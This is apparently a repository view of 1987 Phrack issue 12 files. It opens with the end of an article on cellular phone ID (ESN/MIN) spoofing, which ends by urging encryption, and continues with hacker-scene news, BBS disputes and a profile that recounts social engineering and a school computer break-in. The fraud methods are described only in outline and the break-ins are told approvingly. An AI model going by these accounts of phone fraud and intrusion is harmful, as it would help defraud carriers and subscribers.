With the right equipment, the ESN/MIN pair can be read right off the air
because the mobile transmits it each time it originates a call. Service shops
can capture this information using test gear that automatically receives and
decodes the reverse, or mobile-to-base, channels.
Service shops keep ESN/MIN records on file for units they have sold or
serviced, and the carriers also have these data on all of their subscribers.
Unscrupulous employees could compromise the security of their customers'
telephones.
In many ways, we predict that 'trade' in compromised ESN/MIN pairs will
resemble what currently transpires in the long distance telephone business
with AT&T credit card numbers and alternate long-distance carrier (such as
MCI, Sprint and Alltel) account codes. Code numbers are swapped among
friends, published on computer 'bulletin boards' and trafficked by career
criminal enterprises.
Users whose accounts are being defrauded might--or might not--eventually
notice higher-than-expected bills and be reassigned new numbers when they
complain to the carrier. Just as in the long distance business, however, this
number 'turnover' (deactivation) won't happen quickly enough to make abuse
unprofitable. Catching pirates in the act will be even tougher than it is in
the wireline telephone industry because of the inherent mobility of mobile
radio.
Automating Fraud
Computer hobbyists and electronics enthusiasts are clever people. Why should
a cellular service thief 'burn ROMs' and muck with hardware just to install
new IDs in his radio? No Herculean technology is required to 'hack' a phone
to allow ESN/MIN programming from a keyboard, much like the IMTS phone thumb
wheel switches described above.
Those not so technically inclined may be able to turn to mail-order
entrepreneurs who will offer modification kits for cellular fraud, much as
some now sell telephone toll fraud equipment and pay-TV decoders.
At least one manufacturer is already offering units with keyboard-programmable
MINs. While intended only for the convenience of dealers and service shops,
and thus not described in customer documentation, knowledgeable and/or
determined end users will likely learn the incantations required to operate
the feature. Of course this does not permit ESN modification, but easy MIN
reprogrammability alone creates a tremendous liability in today's roaming
environment.
The Rolls Royce of this iniquitous pastime might be a 'Cellular Cache-Box.' It
would monitor reverse setup channels and snarf ESN/MIN pairs off the air,
keeping a list in memory. Its owner could place calls as on any other
cellphone. The Cache-Box would automatically select an ESN/MIN pair from its
catalog, use it once and then discard it, thus distributing its fraud over
many accounts. Neither customer nor service provider is likely to detect the
abuse, much less catch the perpetrator.
As the history of the computer industry shows, it is not far-fetched to
predict explosive growth in telecommunications and cellular that will bring
equipment prices within reach of many experimenters. Already we have seen the
appearance of first-generation cellular phones on the used market, and new
units can be purchased for well under $1000 in many markets.
How High The Loss?
Subscribers who incur fraudulent charges on their bills certainly can't be
expected to pay them. How much will fraud cost the carrier? If the charge is
for home-system airtime only, the marginal cost to the carrier of providing
that service is not as high as if toll charges are involved. In the case of
toll charges, the carrier suffers a direct cash loss. The situation is at its
worst when the spoofer pretends to be a roaming user. Most inter-carrier
roaming agreements to date make the user's home carrier (real or spoofed)
responsible for charges, who would then be out hard cash for toll and airtime
charges.
We have not attempted to predict the dollar losses this chicanery might
generate because there isn't enough factual information information for anyone
to guess responsibly. Examination of current estimates of long-distance-toll
fraud should convince the skeptic.
Solutions
The problems we have described are basically of two types. First, the ESN
circuitry in most current mobiles is not tamper-resistant, much less
tamper-proof. Second and more importantly, the determined perpetrator has
complete access to all information necessary for spoofing by listening to the
radio emissions from valid mobiles because the identification information
(ESN/MIN) is not encrypted and remains the same with each transmission.
Manufacturers can mitigate the first problem by constructing mobiles that more
realistically conform to the EIA requirements quoted above. The second
problem is not beyond solution with current technology, either. Well-known
encryption techniques would allow mobiles to identify themselves to the
serving cellular system without transmitting the same digital bit stream each
time. Under this arrangement, an interloper receiving one transmission could
not just retransmit the same pattern and have it work a second time.
An ancillary benefit of encryption is that it would reasonably protect
communications intelligence--the digital portion of each transaction that
identifies who is calling whom when.
The drawback to any such solution is that it requires some re-engineering in
the Mobile-Land Station Compatibility Specification, and thus new software or
hardware for both mobiles and base stations. The complex logistics of
establishing a new standard, implementing it, and retrofitting as much of the
current hardware as possible certainly presents a tough obstacle, complicated
by the need to continue supporting the non-encrypted protocol during a
transition period, possibly forever.
The necessity of solving the problem will, however, become apparent. While we
presently know of no documented cases of cellular fraud, the vulnerability of
the current standards and experience with similar technologies lead us to
conclude that it is inevitable. Failure to take decisive steps promptly will
expose the industry to a far more expensive dilemma. XXX
Geoffrey S. Goodfellow is a member of the senior research staff in the
Computer Science Laboratory at SRI International, 333 Ravenswood Ave., Menlo
Park, CA 94025, 415/859-3098. He is a specialist in computer security and
networking technology and is an active participant in cellular industry
standardization activities. He has provided Congressional testimony on
telecommunications security and privacy issues and has co-authored a book on
the computer 'hacking' culture.
Robert N. Jesse (2221 Saint Paul St., Baltimore, MD 21218, 301/243-8133) is an
independent consultant with expertise in security and privacy, computer
operating systems, telecommunications and technology management. He is an
active participant in cellular standardization efforts. He was previously a
member of the senior staff at The Johns Hopkins University, after he obtained
his BES/EE from Johns Hopkins.
Andrew H. Lamothe, Jr. is executive vice-president of engineering at Cellular
Radio Corporation, 8619 Westwood Center Dr., Vienna, VA 22180, 703/893-2680.
He has played a leading role internationally in cellular technology
development. He was with Motorola for 10 years prior to joining American
TeleServices, where he designed and engineered the Baltimore/Washington market
trial system now operated by Cellular One.
--------
A later note indicates that one carrier may be losing something like $180K per
month....

42
phrack12/1.txt Normal file
View file

@ -0,0 +1,42 @@
==Phrack Inc.==
Volume Two, Issue 12, Phile #1 of 11
Index
~~~~~
3/29/87
Ok, so we made it through another few delayed weeks of saying a
release was coming soon. But of course, I finally got motivated and got this
issue moving. I'd like to thank many of the people who rushed themselves to
get their articles to me when they didn't know that the release was so soon,
and for those that haven't gotten their articles in in time (for two issues,
mind you [no names mentioned, of course, but I felt a denotation would be
sufficient to provide my feelings in the introduction]) a big, "Oh well."
We're glad you've continued your patronage (Ha!) with Phrack Inc. over the
past year and a half or so and a big thanks to all of the writers who have
kept the publication going for all this time. But after this issue comes a
break. Not a break in putting Phrack out, but a break in the grind and rush
to get it out as I did with this issue. Phrack 13 will be EXTREMELY
different, and I guarantee that to you. Phrack 13 will be released on April
1st (hmm...ring any bells?) so be watching for it! Later
Taran King
Sysop of Metal Shop Private
------------------------------------------------------------------------------
This issue of Phrack Inc. includes the following:
#1 Index of Phrack 12 by Taran King (2.3 k)
#2 Pro-Phile IX on Agrajag The Prolonged by Taran King (6.7 k)
#3 Preview to Phrack 13-The Life & Times of The Executioner (4.9 k)
#4 Understanding the Digital Multiplexing System (DMS) by Control C (18.8 k)
#5 The Total Network Data System by Doom Prophet (13.2 k)
#6 CSDC II - Hardware Requirements by The Executioner (8.1 k)
#7 Hacking : OSL Systems by Evil Jay (8.7 k)
#8 Busy Line Verification Part II by Phantom Phreaker (9.1 k)
#9 Scan Man's Rebuttal to Phrack World News (16.5 k)
#10 Phrack World News XII Part I by Knight Lightning (13.3 k)
#11 Phrack World News XII Part II by Knight Lightning (14.7 k)

239
phrack12/10.txt Normal file
View file

@ -0,0 +1,239 @@
==Phrack Inc.==
Volume Two, Issue 12, Phile #10 of 11
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN >>>>>=-*{ Phrack World News }*-=<<<<< PWN
PWN Issue XII/1 PWN
PWN PWN
PWN Created, Compiled, and Written PWN
PWN by Knight Lightning PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
Local News March 20, 1987
~~~~~~~~~~
This issue of PWN marks the anniversary of Metal Shop Brewery.
Things are looking up. Metal Shop Private is back and all previous members
are asked to call back. The same passwords and logons still work and even
better, the old posts have been saved despite the hard drive crash a few
months ago.
Phrack XIII will be released on April 1, 1987; April Fool's Day!
It features joke files, fiction files, humorous files, and of course, rag
files. With all the seriousness of the regular issues of Phrack, this is a
chance to release some building flashes of comedy. Please note that files for
Phrack XIII can only be submitted by members of Metal Shop Private. This does
not apply to other issues of Phrack. Don't miss it!
SummerCon 1987
~~~~~~~~~~~~~~
For those that don't already know, TeleComputist Newsletter and Phrack Inc.
are sponsoring this year's big phreak gathering in St. Louis, Missouri. As
many of you may note, St. Louis is the home of Metal Shop Private, Phrack
Inc., and TeleComputist Newsletter. We all hope that since St. Louis is in
the middle of the country that it will be easy for people to attend. We
extend an invitation to anyone who wants to come. We will have a conference
room and two suites in a hotel in St. Louis.
The official date for SummerCon 1987 is June 19,20. This is far enough into
the summer that everyone of the younger generation should be out of school and
early enough that no one has to worry about facing reality right away. This
date has also been chosen specifically as to not interfere with the St. Louis
VP Fair (Vale Profit).
If you are going to attend SummerCon, we ask that you contact Knight
Lightning, Taran King, or Forest Ranger for more details. The TeleComputist
Information Line is (314) 921-7938. The names of those attending will be kept
confidential so as to not cause anyone discomfort, however we do ask that you
identify yourself at the conference by means of a name tag or some form of
identification. Security personal is welcome to attend, but we request that
you let us know ahead of time. If anyone, especially security personnel,
would like to speak at SummerCon please also let us know and we will schedule
you in.
:Knight Lightning
______________________________________________________________________________
Hackers Caught Using Credit Card To Buy More Equipment February 20, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Ben L. Kaufman of The Cincinnati Enquirer
"I was uneasy about the pickup."
Two young "hackers" in Milford using an electronic bulletin board to get
stolen credit card numbers and buy hardware to expand their computers. Now
they're in big trouble because unauthorized use of a credit card is a federal
offense and the Secret Service caught them. "Computer-aided credit card fraud
is increasingly common, said special agent in charge, James T. Christian on
Tuesday, "but using the filched name and number to enhance computer clout was
a unique touch."
The two youths had a $1,300 order sent to an abandoned house on Ohio 131E,
Christian said, but when they picked it up an agent was waiting with the UPS
deliveryman.
John Martin Howard, 21, 5788 Meadowview Drive, Milford was cited before U.S.
magistrate J. Vincent Aug Jr., who accepted his plead to guilty Monday and
released him on his promise to return when summoned.
"I was uneasy about the pickup," Howard recalled in a telephone interview. The
risk of getting caught "was in the back of my mind." And it was an awful
moment when the Secret Service agent confronted him and his juvenile buddy,
Howard added. "I think they were surprised," Christian said. Howard was
charged with attempted use of an unauthorized credit card. His juvenile
partner -- who refused to comment Tuesday -- was turned over to his parents.
Christian said the youths ordered equipment from Computer-Ability in suburban
Milwaukee paying with the stolen credit card. A sharp-eyed store employee
noted purchases on that credit card were coming in from all over the country
and called the Secret Service. Within two weeks the trap in Milford was set.
Howard said his young friend knew the Cincinnatian who led them to the
bulletin board filled with the names and the numbers of stolen credit cards.
"We got it from somebody who got it from somebody who got it from somebody on
the east coast," Howard recalled. That new acquaintance also boasted of using
stolen card numbers from electronic bulletin boards to buy expensive
accessories and reselling them locally at bargain process.
He and his friend used the stolen credit card to upgrade his Atari 800 system,
Howard said. "We ordered a bunch of hardware to use with it." In addition to
the purchase that drew the secret service to them, Howard said they "ordered
other stuff, but before we received anything, we were picked up." Howard said
he'd had the Atari about two years and was getting bored with it and home
computers in general.
He had taken computer programming for eight months after high school, he said,
but hadn't used it. He would like to try computer-aided design and
engineering, but right now, he's working in a pizza parlor. Christian said
Howard's parents had been enthusiastic about his computer interests and
friends who shared them. "They though it would keep them out of trouble."
Assistant U.S. attorney Kathleen Brinkman and Christian said the Cincinnati
area investigation was continuing and numerous juveniles, some quite young,
may be involved.
Thanks to Grey Elf
Re-typed for PWN into lowercase by Knight Lightning
______________________________________________________________________________
Hang On... Phone Rates Are Falling Again! March 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>From Changing Times Magazine March 1987 Issue
No news that long-distance rates are still headed down, but now local rates
are poised to follow, at least in some areas.
Competing long-distance carriers have already been forced to react to AT&T's
January rate cut, which averaged 11.2%, with cuts of their own. Now the
Federal Communications Commission [FCC] may propose that an additional $1 or
$2 be added to the subscribers line charge, the $2-a-month access charge that
every residential customer pays. If that happens it would compensate.
Since AT&T's divestiture in January 1984, the telephone services component of
the consumer price index has risen 17.4%, reflecting a 36.7% increase in local
rates at the same time long-distance charges were falling. But price
increases for overall service have moderated each year, falling 2.7% in 1986
from 4.7% in 1985 and 9.2% in 1984. That trend should continue as local rates
stabilize and even fall. Wisconsin and Vermont, for example, have ordered
local companies to make refunds, and a number of states - New York,
Pennsylvania, Washington - are considering lowering rates to reflect the
improved financial position of local phone companies. Those companies will
benefit from tax reform, and lower inflation and interest rates have resulted
in lower expenses in several other areas.
Things are not looking good for some of AT&T's competitors in the long
distance business, however. Forced to follow AT&T's rate cuts, both MCI and
US Sprint are hard-pressed financially, and analysts don't rule out the
possibility that one or both could get out of the long-distance business,
potentially leaving AT&T a monopoly again. But that would be "politically
unacceptable," says analyst Charles Nichols of E.F. Hutton. Some
alternatives: allowing regional phone companies to enter the long-distance
business or allowing AT&T to keep more of the profits it earns from increased
efficiency instead of forcing the company to cut rates. That would take some
pressure off competitors.
Special Thanks to Stingray
______________________________________________________________________________
Police Arrest Computer "Hacker" Suspect March 15, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>From the St. Louis Post-Dispatch
"MCI told police it was losing $2.7 million a month to such 'hackers.'"
A computer software engineer [Robert Wong] has been arrested at his home in
Maryland Heights, Missouri on suspicion of trying to get into the computer
system of MCI Telecommunications Corporation.
The case is the fourth in this area involving computer "hackers" who have
tried in recent months to get into MCI's computer system, police say.
Detective John Wachter of the Maryland Heights Police Department said the
department would seek a warrant today charging the suspect with "tampering
with computer users," a felony.
The charge is being sought under a state law enacted last year to deal with
hackers - people who try illegally to tap into other computer systems.
The suspect is Robert Wong, 23, of the 2000 block of Maverick Drive, Maryland
Heights, Missouri. Police tracked down Wong by a court-sanctioned "trap" on
his phone after MCI learned that someone was trying to tap into its
long-distance lines.
In a written statement to police, Wong said he "came across" MCI's programs
and access codes. He said he was "amazed" when he got into the system. "I
know it was illegal, but the urge of experimenting was too great," he told
police.
Typed For PWN by Taran King
______________________________________________________________________________
PWN Quicknotes
~~~~~~~~~~~~~~
In upcoming months P-80 will be moved from her ole TRS Model 1 to an IBM PC
compatible. In addition to a boost in storage capacity (amount still
undecided), P-80 will be adding a new "user to user" direct file/program
transfer thus allowing the membership the ability to privately send text or
programs directly to another user. There will also be the ability to forward
a message with text/program attached) to another user after receipt. (2/26/87)
Information from
<S><C><A><N> <M><A><N> & P-80 Information Systems
------------------------------------------------------------------------------
If you consider yourself a phreaker or a hacker in any way, shape or form,
then read on! The Telecom Security Group is sponsoring the first on-line
hack/phreak survey. It consists of about 30 minutes work of answering
questions (or until you want to stop) that pertain to phreaking, hacking, the
security, and the attitudes surrounding it all.
You are allowed to identify yourself during the survey if you wish or you may
remain totally anonymous. It's really just the general answers that will
count. Call now: 914-564-6648 (914-LOG-ON-IT) and type SURVEY at the main
prompt to get the survey. Thanks for your involvement, and do spread the word
to any board that considers itself phreak/hack oriented.
Information by Taran King & Tuc (2/6/87)
------------------------------------------------------------------------------
Telecommunications giant AT&T is lying in its advertisements that claim it has
an exclusive toll-free number for foreign clients to reach U.S. businesses,
its competitor says in a lawsuit.
Worldwide 800 Services Inc. says that it has filed suit against AT&T with the
FCC, charging AT&T with false advertising. The ads by AT&T claim that it can
provide a global telephone network that would allow clients in foreign
countries to call a toll-free number to reach businesses in the United States.
AT&T claimed that "You won't find this type of service anywhere else."
Worldwide 800 says that their company provides toll-free service from any
foreign city to the U.S., whereas AT&T can only provide toll-free service on a
countrywide basis. An AT&T spokeswoman denied all of the charges, stating
that the advertisement in question was neither fraudulent or deceptive. If
Worldwide 800 Services wins the case, they state that they will demand
corrective advertising and seek monetary damages.
Information from Lucifer 666 (3/1/87)
______________________________________________________________________________

258
phrack12/11.txt Normal file
View file

@ -0,0 +1,258 @@
==Phrack Inc.==
Volume Two, Issue 12, Phile #11 of 11
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN >>>>>=-*{ Phrack World News }*-=<<<<< PWN
PWN Issue XII/2 PWN
PWN PWN
PWN Created, Compiled, and Written PWN
PWN by Knight Lightning PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
Toll-Free Woes January 26, 1987
~~~~~~~~~~~~~~
>From Time Magazine; reprinted in the February 1987 Issue of CO Magazine
While Oral Roberts struggles with budgets, fundamentalist preacher Jerry
Falwell faces a different kind of money pinch. The Lynchburg, VA,
televangelist has long used toll-free phone numbers to assist viewers seeking
spiritual help.
For many months Falwell foes, aware that each phone-in cost $1, have purposely
clogged his lines. An Atlantan programmed his computer to dial Falwell every
30 seconds. Before Southern Bell stepped in, the stunt cost Falwell $750,000.
Late last year, the Daily Cardinal student newspaper at the University of
Wisconsin -- Madison ran a column advocating "telephone terrorism" and listed
several targets, including Falwell.
The TV preacher estimates that annoyance calls cost him more than $1 million
last year, not counting lost donations. Falwell, who is considering legal
action, regards the calls as "unlawful activities" that do "injury to the
cause of Christ."
[Well now...isn't that special? And just where did all these people get the
idea to do "injury to the cause of Christ?" From me, Knight Lightning? No, I
don't think so. From oh maybe Phantom Phreaker? No, I don't think so.
Possibly Lucifer 666, but the big question is... Could it be... SATAN!!!?]
Typed For PWN by Knight Lightning
______________________________________________________________________________
Voice numbers: Are They Really Necessary? March 5, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A recent series of events on ShadowSpawn BBS has attracted much attention in
the hack/phreak community. It seems that the sysop, The Psychic Warlord,
denied access to Lex Luthor, Kerrang Khan, and Silver Spy because of their
failure to leave valid voice phone numbers. The following messages have been
taken from ShadowSpawn BBS. [Some posts have been re-formatted].
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
32/50: This board...
Name: The Psychic Warlord #1
Date: 6:36 pm Thu Feb 26, 1987
Alright goddamn it, I'm so fucking pissed off that I'm just about ready to
say Fuck It and take down the board for good. Why? Seems that few people are
happy with the way I run this board. No, not really with the way I run it,
but more like the way I choose to validate my users. Ok, fine... You don't
like it then get the fuck out and quit complaining.
I set certain rules that people have to abide by to get access to this
board. Very simple fucking rules. And now I'm finding out that people don't
want to abide by these rules, and basically tell me I'm fucked in the head for
having and going by them. What rules? For one thing, and this is the major
bitch-point here, new users (no matter WHO THE FUCK they are) are *REQUIRED*
to leave a valid voice number where I or Ctrl can reach them at for
validation. No big fucking deal... Just a goddamn phone number.
"Oh, but I can't give you my voice number. I'm a hacker, and I do untold
amounts of illegal things and I can't risk my number getting out." Riiight.
Like I'm really some fucking Fed who's gonna bust yer ass, or some geek who
gives out peoples phone numbers to any-fucking-body who asks. BULLSHIT!
I'm the Sysop of a (hopefully) respected BBS, and along with that goes a
certain responsibility. I'm not about to go passing out peoples numbers. *I*
have respect for other hackers privacy, unlike some people who choose to
invade mine just for the fucking hell of it. I require that new users leave
their voice numbers for a number of GOOD reasons:
1) Trust -- If they can trust me with their voice numbers, then I can trust
them with access to my board. I need that kind of trust between
me and my users. If they feel that they can't trust me enough to
give me a lousy phone number, then how in God's name am I supposed
to be expected to trust them at all?? My ass is on the line just
as much (if not more) than any user of this board!
2) Security -- Ok... So how do I know if someone is really a Fed or not? I
don't! I go by instinct. Having a person's voice number let's
me call them for validation and get to know them a helluva lot
better than I could through e-mail. Plus, if suspicion ever
arose about a user of my board being a Fed or not, how could I
check this out? If I don't have their voice number, I have no
leads as to where to find or who the fuck this person really
is. Now I don't go checking everyone on the board via the
numbers they give me. I have NEVER had to do that for ANY
user, but the possibility is there. And rather than throw a
possibly innocent person off the board merely on a hunch, we
might be able to prove whether or not it's true. This is
extremely hypothetical, but like I said... the possibility is
there.
Ok, so why the hell should I have to require that established people, like
Lex Luthor and Silver Spy, leave valid voice numbers? Is it fair to the other
users? Hell no. If I required only certain people to give me their numbers,
then what does that do to their trust in me?? It's like me saying, "Well, I
don't trust you... I don't know you that well. You have to sacrifice more
than these guys to get access." That's BULLSHIT, and I'm not about to do it.
If one person is required to give a valid voice number, then every damn user
is required to!
I've been getting a lot of shit the past couple days because I've denied
access to some very well known and respected people in the hack/phreak world.
Namely Lex Luthor, Silver Spy, and Kerrang Khan. I denied all of them access
because they all refused to leave a voice number. Fine. Then they don't get
access. Ctrl [Ctrl-C is a cosysop on ShadowSpawn] said I was crazy. Taran
said pretty much the same. Taran also tried to get me to change my mind...
to condescend, or go against what I believe in and how I believe this board
should be run. He (Taran) said that by my denying Lex and the others access
that I would be hurting this board more than helping it. ***I DON'T GIVE A
DAMN***
I'm not impressed in the least with any of those peoples reputations. I
never have been a "groupie" and I'm not about to start now. Whether or not
they are good or not isn't the issue here, and some people don't seem to
realize that. Yes, Lex is good. He's well known. He's even a nice guy...
I've talked to him before and personally I like him. But I don't play
favorites for anyone. Not Lex, not Silver Spy, and not Kerrang Khan. Nobody.
What really pissed me off, and I should have told Taran that I resented it
at the time, is that TK said that apparently this board is "elite". That I
consider this board to be too good. Personally I think this fucking board is
overrated, and yes Taran... I resented that remark. I can't remember exactly
what he said, but it was something like, "In your logon message you have
'We're not ELITE, we're just cool as hell,' but apparently you ARE elite."
This board isn't "elite" and if I come off seeing that way sometimes, it's
only because people are getting half the picture of what I'm doing.
Ok, so I deny Lex Luthor access to this board. That's all you people seem
to think about. The actual denying of access. You think, "How can he do
that?! What gall! He must be a real egotistic bastard to think that Lex
Luthor isn't good enough to be on this board!" If you think that, and most of
you have thought only that, then you're fucked in the head.
Yes, I realize who these people are! Yes I know their reputations and how
they are renowned for their skills as hackers and phreakers... But like I
said before, that's not the issue. It never was. I *KNOW* how good these
people are. I *KNOW* about their reputations and I respect them for it, but I
don't care. That's not why they've been denied access!
When I deny someone access to this board it's usually for one of two
reasons;
1) They left a false voice number or
2) They either blew off or left really crappy answers to the filter.
Personally I'd be thrilled to have Lex or Silver Spy on the board... and
any of a number of people. But these people can't find it in themselves to
trust me. If they can't trust me, then I can't trust them. It's as simple as
that.
I'm not about to let anyone on this board that I can't trust. It's not
fair to the other users, and it's damn stupid of me. I run this board the
best way I know how. I do what I do in respect to new user validations
because it's the best way, through trial and error, that I have found to
handle it. If people can't respect the way in which I choose to run my board
then I'd appreciate it if they never called. And when regular users of my
board start questioning the way I do thing, and telling me that I'm WRONG for
doing things the way I believe they should be done, then I really start to
wonder what the fuck I'm doing it for at all. I'm not a quitter, and I don't
like the idea of giving up and taking down the board. I'm going to run this
board the way I think is best, and I'm not about to conform to what other
people think I should do.
I've probably stepped on some toes and offended some people with this, but
that's just too damn bad. I hate fighting the topic but I'll fight it if I
have to.
--==The Psychic Warlord==--
37/50: Take a fucking valium
Name: Taran King #45
Date: 9:02 am Sat Feb 28, 1987
You're known for an explosive temper, PW as well as sometimes being extremely
irrational. My policy is to let people on the my board with voice numbers
only. Through the history, I've made maybe 5 exceptions. Some of 'em include
Lex, Spy (at first), Tabas, Videosmith, and Phucked Agent 04. Now, I never
got anything out of PA04 because he got a "call" soon after he got on the
board, but the rest of the members have contributed extremely well to the
board. I just made sure I knew it was really them by referencing and cross
referencing.
If your morals are that unbendable, PW, then you need to relook at the purpose
of this board. If it's to spread phreak/hack knowledge as you said on the
phone, then to have those people on with the experience that they have would
hardly hinder the board. I seriously doubt anyone would feel offended if any
of the forementioned people got on here without leaving a valid voice number,
being that they're not on any other board with a voice number.
I know that Lex is not giving out his number to even the best of his
friends. Spy is really careful about it these days. Not so sure about
Kerrang but he's travelling about now so he's not in one place for too long
nowadays. It's your board and I was trying to give you some constructive
criticism, but you took it the wrong way. You don't have to claim you're
ELITE to be elite. Elite merely means that you've got the respected members
of the community on board. Well, you've got 'em. If you don't like it, I
suggest you go through and purge the log like a big dog. Actually, fuck it.
I'm tired of getting into arguments for trying to help someone. Feel free to
delete my account if you feel that I've not contributed enough information to
the board, or if you've rethought the purpose and decide that it's not for
what I've contributed, dump me. Fuck dis
-TK
44/50: Well...
Name: The Psychic Warlord #1
Date: 4:57 pm Sun Mar 01, 1987
I'm glad that some people agree with me on this. I can understand Lex's
point of view, too. I can also remember a time when I myself refrained from
giving my number to any sysops. But... I've changed my point of view
considerably after living the Sysop life for well over 1.5 years. Now if I
ever wanted access to a board, and the Sysop of that board asked for my voice
number, I'd give it to him.
I've given Lex access to this message base for a short period of time so
that he can check out the discussion. He called me voice the other day and we
talked for a while about this whole biz. I'd like him, and Spy, on the board,
and possibly they'll change their minds. If not, that's cool. I'm just going
to let the whole thing kind of slide from here on out. If they change their
minds, great... Well, Adios.
--==The Psychic Warlord==--
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Kerrang Khan, when notified that he must leave a voice number, said "there is
no reason Psychic Warlord would need any user's phone number." He also stated
that the fact that PW insisted on voice numbers was very "suspicious."
Silver Spy, when notified that he must leave a voice number, never bothered
calling again.
Lex understood the whole situation and remained cool. He said he could see
why a sysop would need voice numbers of his users. Lex was worried about the
board he left it on getting busted and the authorities getting his number. So
PW, in response to this deleted all users phone numbers from the board and
encrypted them in a hidden sub-directory. Now the numbers are there only and
are totally hidden.
Information Provided By
Lucifer 666/Psychic Warlord/ShadowSpawn BBS/Taran King
______________________________________________________________________________

136
phrack12/2.txt Normal file
View file

@ -0,0 +1,136 @@
==Phrack Inc.==
Volume Two, Issue 12, Phile #2 of 11
==Phrack Pro-Phile IX==
Written and Created by Taran King
3/17/87
Welcome to Phrack Pro-Phile V. Phrack Pro-Phile is created to bring
info to you, the users, about old or highly important/controversial people.
This month, I bring to you a name from the past...
Agrajag The Prolonged
~~~~~~~~~~~~~~~~~~~~~
Agrajag was popular on many boards and hung out with many of the
stronger names in the phreak/hack community.
------------------------------------------------------------------------------
Personal
~~~~~~~~
Handle: Agrajag The Prolonged
Call him: Keith
Past handles: None
Handle origin: Fictional character in Hitchhiker Trilogy
Date of Birth: 6/14/67
Age at current date: 19 years old
Height: 6'2"
Weight: 139 lbs.
Eye color: Brown
Hair Color: Depends on the day (Orange, Brown, Black, Hot Pink, etc.)
Computers: TRS Model III, worked his way up to a TVI 950 Dumb
Terminal
------------------------------------------------------------------------------
Agrajag started phreaking and hacking in about 1979 through the help
of some friends of his. He originally started hacking (programming) on a
Vector 8080 in 4th grade. His instructor then is now one of the top 5
computer instructors. Phreaking began with, of course, codes but he was very
interested in how the phone system worked. He had read some books on the
phone company and their evils in their earlier days and he was very interested
in the very idea of becoming an operator. Members of the elite world which he
has met include Tuc, BIOC Agent 003, Broadway Hacker (negative), and Cheshire
Catalyst, all at a Tap meeting he attended. On regular BBSes, there were
listings for other BBSes which turned out to eventually be phreak BBSes. Some
of the memorable phreak boards he was on included WOPR, OSUNY, Plovernet, and
Pirate 80. His phreaking and hacking knowledge came about with the group of
people including Tuc, BIOC, and Karl Marx.
Agrajag was a video game programmer for the last American owned video
game manufacturer, Cinematronix, Inc. (of Dragon's Lair, Space Ace, World
Series, and Danger Zone fame, of which he helped with World Series and a big
part of Danger Zone) which went bankrupt a bit over a month ago.
Agrajag takes interviews for magazines (such as this) which keeps up
his phreak/hack activity. He (and a bunch of others) were written up in a USA
Today article as well as being interviewed by a local paper when The Cracker
(Bill Landreth) got busted (they took pictures of the back of his head in
front of his computer).
Agrajag was never in any major phreak groups except for The
Hitchhikers (Bring your towel!) which was just a group of local friends.
------------------------------------------------------------------------------
Interests: Telecommunications (modeming, phreaking, hacking,
programming), music, concerts, club hopping, and video
games.
Agrajag's Favorite Thing
------------------------
Club/Bar hopping: Tijuanna (TJ)
Most Memorable Experiences
--------------------------
Going officing. Tuc, BIOC, and he were let into a local CO and they used
their copying machine to make copies of their manuals. They
replaced the paper [over 2 reams] later and didn't steal anything
major besides the paper and a few NY Bell signs.
Called supervisors saying that they had witnessed some trunks red-lighting and
there would be severe problems if they didn't contact this guy,
Abbot Went, in San Francisco. There were about 10 supervisors in
mass hysteria (on Thanksgiving) wondering what to do. Later, they
called up Abbot again saying they were the White House switch and
said some kids were fooling around.
Breaking into his school's computer in his senior year mid-semester. He had
scanned it out on a school prefix and the login and password was the
name of his school. It was a TOPS-20 system and he was well enough
versed in TOPS-20 to know what to do. The next day, he told the
vice-principal that he had broken into the computer and that they
had some major security problems. They said he was bullshitting and
he told them to read their mail. Then, later, he brought in his
equipment and showed them with the principal there. He was
threatened by the principal with police, etc. but he told them to go
to hell. He was later offered a job helping the security on the
system but instead, he told them how they could solve the security
problem and didn't take the job.
Agrajag's teacher asking him to do a credit check on someone illegally. He
eventually did part of it, but the teacher was an asshole so he
didn't give all the information to him.
Getting flown to the Tap meeting by a friend.
Some People to Mention
----------------------
Tuc
BIOC Agent 003
Karl Marx
Automatic Jack
All for being friends and all around good people and phreaks.
------------------------------------------------------------------------------
Agrajag is out and out against the idea of the destruction of data.
He hated a person intensely because they posted private lines with
instructions on how to maim a system owned by someone who was already hated.
He deleted the message (he was co-sysop) and it became a bit controversial.
He hated that then and still has no respect for anyone who does this. Where
have all the good times gone?
------------------------------------------------------------------------------
I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming
in the near future. ...And now for the regularly taken poll from all
interviewees.
Of the general population of phreaks you have met, would you consider most
phreaks, if any, to be computer geeks? The general populus, yes, but good
phreaks, no. Thank you for your time, Agrajag.
Taran King
Sysop of Metal Shop Private

84
phrack12/3.txt Normal file
View file

@ -0,0 +1,84 @@
==Phrack Inc.==
Volume Two, Issue 12, Phile #3 of 11
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% The Life & Times of The Executioner %
% %
% by Oryan QUEST %
% %
% Written on 3/16/87 %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Introduction:
------------
This file was not written with the intention of being cute, funny or to tell
fellow phreaks and hacks how lame or stupid they are. It was written to open
the eyes of these idiots to see what the REAL story is.
The Executioner/Mikey
---------------------
I'm am sure the majority of you have heard of "Exy." His claim to fame is
simply telling people how lame they are or how great and sexy he is. He also
claims to be wealthy and that Phreak Klass 2600 is the best bulletin board on
this side of the galaxy. Let us examine some key events.
When Metal Shop Private was up, Mr. Sexy Exy (oh and I doubt he really is),
proceeded to rag on everyone on the system with the exception of a few that he
ass-kissed. He then turns around when Phreak Klass 2600 (and I am in no way
ragging on Phreak Klass) goes up, to ask everyone he has annoyed for over 2
months and badgers them to call. Now, Mike, I seriously doubt you are as sexy
